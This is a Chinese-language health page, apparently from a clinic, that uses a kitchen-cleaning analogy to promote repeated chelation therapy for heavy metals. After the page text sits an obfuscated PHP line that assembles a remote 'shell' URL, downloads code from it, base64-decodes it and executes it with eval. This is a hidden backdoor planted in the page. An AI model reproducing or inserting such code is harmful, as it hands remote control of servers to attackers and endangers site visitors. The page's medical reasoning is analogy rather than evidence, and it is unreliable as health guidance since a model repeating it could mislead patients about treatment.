收藏本站
清理廚房理論 列印 E-mail
        每年我們至少都會做一次家庭大掃除,所需用到的時間、金錢,取決於房子老舊的程度與平時對環境維持的狀況而定;而廚房更因使用的頻率及平時清理的程度而有所差異。愈老舊的房子、使用頻率愈多的廚房,平時清理程度愈不足的,大掃除時就要花更多的時間與金錢來做整理;同樣的道理,遺傳基因愈不好的,工作、生活壓力愈大的,平時對健康愈不注意的,當然在做第一次螯合療法時,就必須要花更長的時間與較多的次數,才能達到滿意的療效。

        每個家庭對廚房髒亂程度的容忍度不一樣,有的家庭會每天都做辛勤的擦拭,有的家庭每週會做一次小清理,有的家庭一個月一次,有的則一年才會做一次大掃除。但無論如何,清掃過的廚房,總比不清掃的廚房乾淨些,多久清掃一次?對清潔程度的要求如何?端視每個家庭如何定義「乾淨」的程度來決定。

        重金屬在人體產生的傷害程度,與每個人對重金屬傷害的忍受程度也有極大的差異,因此我們建議每個患者至少須做完醫師評估所需的次數,等療程結束後,再依個別的身體狀況決定後續的治療間隔與次數。
 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));